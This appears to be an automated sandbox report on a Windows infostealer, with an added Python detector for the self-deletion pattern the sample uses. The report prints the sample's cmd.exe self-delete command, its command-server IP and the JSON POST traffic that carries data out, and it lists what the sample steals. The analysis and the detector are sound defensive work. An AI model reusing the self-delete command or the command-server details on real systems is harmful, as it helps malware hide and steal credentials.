Windows Analysis Report
app.exe

Overview

General Information

Sample name: app.exe
Analysis ID: 1436386
MD5: 75b9ef9142a78671d449c8d22ab6be14
SHA1: 0461f1c46644acde8020bb59b53b1e34b65977ca
SHA256: e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains functionality to infect the boot sector
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Self deletion via cmd or bat file
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • app.exe (PID: 7652 cmdline: "C:\Users\user\Desktop\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
    • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • app.exe (PID: 7132 cmdline: "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe" MD5: 75B9EF9142A78671D449C8D22AB6BE14)
      • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 1808 cmdline: cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 1172 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
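
The process tree above shows the self-deletion step: the dropped copy in %TEMP% spawns cmd.exe, which waits five seconds (long enough for the parent to exit and release its own file handle) and then deletes the parent's image with del /f /q. The following Python is an added detection example, not part of the Joe Sandbox report. It runs over constructed Sysmon Event ID 1 style records (the first mirrors the command line in the tree above, the other two are made up for contrast) and flags a cmd.exe child whose del target is the path of its own parent process. It also accepts the common ping -n delay variant, which the report does not show.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 shape. The first mirrors the
# command line in the report's process tree; the other two are made up for contrast.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe",
        "CommandLine": r"cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit",
    },
    {   # benign: a build tool deleting a scratch file, not its own image
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Program Files\Build\msbuild.exe",
        "CommandLine": r"cmd.exe /c del /f /q C:\build\obj\tmp.txt",
    },
    {   # same technique with a ping-based delay and a quoted path (assumed variant)
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\user\Downloads\setup.exe",
        "CommandLine": r'cmd.exe /c ping 127.0.0.1 -n 4 > nul & del "C:\Users\user\Downloads\setup.exe"',
    },
]

# A delay that gives the parent time to exit so Windows releases its image file handle.
DELAY_RE = re.compile(r"\b(?:timeout\s+/t\s+\d+|ping\s+(?:\S+\s+)?-n\s+\d+)", re.IGNORECASE)
# del/erase, optional switches, then a possibly quoted path; stop at a chain operator or end.
DEL_RE = re.compile(r"\b(?:del|erase)\b\s+(?:/[a-z]\s+)*\"?([^\"&|]+?)\"?\s*(?:&|\||$)",
                    re.IGNORECASE)


def deleted_target(cmdline):
    """Path passed to del/erase in a cmd.exe command line, or None."""
    m = DEL_RE.search(cmdline)
    return m.group(1).strip() if m else None


def classify(event):
    """'self-delete' (delay + del of parent image), 'parent-delete' (no delay), or ''."""
    if not event["Image"].lower().endswith(r"\cmd.exe"):
        return ""
    target = deleted_target(event["CommandLine"])
    if target is None or target.lower() != event["ParentImage"].lower():
        return ""
    return "self-delete" if DELAY_RE.search(event["CommandLine"]) else "parent-delete"


def find_self_deletes(events):
    """(parent image, verdict) for every event that deletes its own parent."""
    return [(e["ParentImage"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for parent, verdict in find_self_deletes(SAMPLE_EVENTS):
        print(f"{verdict}: {parent}")
```

The comparison is against ParentImage rather than the raw del argument alone, so a process deleting arbitrary files does not fire; in production, normalise 8.3 short names and environment-variable forms of the path before comparing, since the sample's own path is whatever the dropper wrote.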
No configs have been found
No yara matches
No Sigma rule has matched

Snort IDS alert

Timestamp: 05/05/24-00:24:50.450010
SID: 2051909
Source Port: 80
Destination Port: 49789
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Virustotal: Detection: 11%
Source: app.exe | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Joe Sandbox ML: detected
Source: app.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\app.exe | Code function: 0_2_025D04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue
Source: C:\Users\user\Desktop\app.exe | Code function: 0_2_025D04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Code function: 3_2_025A04D0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom,TlsSetValue,HeapFree,TlsSetValue
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Code function: 3_2_0255EB69 HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,CloseHandle,HeapFree,HeapFree,ReadFile,ReadFile,CryptUnprotectData,CryptUnprotectData,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,HeapFree,ReadFile,ReadFile,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,ReadFile,ReadFile,GetLastError,HeapFree,HeapFree,CloseHandle,GetLastError,HeapFree,HeapFree,HeapFree,HeapFree
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Code function: 3_2_025A04C0 TlsGetValue,TlsGetValue,TlsSetValue,BCryptGenRandom

Compliance

Source: C:\Users\user\Desktop\app.exe | Unpacked PE file: 0.2.app.exe.2560000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Unpacked PE file: 3.2.app.exe.2530000.2.unpack
Source: app.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: Binary string: SRLPR.pdBf | source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU | source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU | source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\app.exe | Code function: 0_2_00427361 GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA
Source: C:\Users\user\Desktop\app.exe | Code function: 0_2_025CA710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree
Source: C:\Users\user\Desktop\app.exe | Code function: 0_2_025E4B93 FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Code function: 3_2_0259A710 CloseHandle,FindFirstFileW,FindClose,HeapFree,HeapFree,HeapFree
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Code function: 3_2_0259FEC0 HeapFree,HeapFree,HeapFree,HeapFree,FindFirstFileW,HeapFree,HeapFree,GetLastError,HeapFree,HeapFree
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe | Code function: 3_2_025B4B93 FindFirstFileExW

Networking

Source: Traffic | Snort IDS: 2051909 ET TROJAN Win32/FireStealer Related Server Response 144.208.127.230:80 -> 192.168.11.20:49789
Source: Joe Sandbox View | IP Address: 172.67.74.152
Source: Joe Sandbox View | ASN Name: SHOCK-1US
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknown | DNS query: name: api.ipify.org (three identical queries observed)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | Host: api.ipify.org
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | Host: 144.208.127.230 | 48 such POSTs observed, with Content-Length values in order: 451, 996, 1008, 1007, 992, 1004, 1002, 1005, 1000, 999, 998, 992, 995, 999, 1010, 1010, 994, 1006, 1005, 1008, 1002, 1002, 1001, 996, 998, 185, 993, 1001, 1000, 1000, 995, 997, 1003, 1013, 1014, 998, 1010, 1009, 1012, 1006, 1006, 1005, 1001, 1002, 100842, 29428, 57241, 1270200
Source: unknown | TCP traffic detected without corresponding DNS query: 144.208.127.230 (50 connections observed)
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | Host: api.ipify.org
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: app.exe, 00000003.00000003.3182148991.00000000055CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 | Content-Length: 451 | Host: 144.208.127.230
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230
Source: app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3141697165.000000000559A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.000000000094A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242018626.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3185017394.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3262410113.0000000005596000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3137031558.000000000558E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3099980672.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.0000000000950000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000094A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005591000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101657336.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/7
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103448637.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/B
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/J
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/U
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/Y
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/e&
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/v
Source: app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/z
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230/~
Source: app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230:80/
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://144.208.127.230:80/-35b871f0a661
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/-35b871f0a661ozi
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/L
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/R
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/T
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/o
Source: app.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/w
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230U
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://POSTHTTP/1.1Content-Type:
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alldrivers4devices.net
Source: app.exe, 00000003.00000003.3246373817.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000913000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3294569055.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRJX35jqtu8qT267s2bDnzhp-lJVMQdhF5S6U4t
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRgJaQoM7DXWRt-dg7YoOenavsVCx2_mgiT8oFn
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcSFe5-1ue4YewDL7QTtYG5GBPfUy7h9iJ7t-0kd
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
Source: app.exe, 00000003.00000003.3183161453.00000000058D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/0
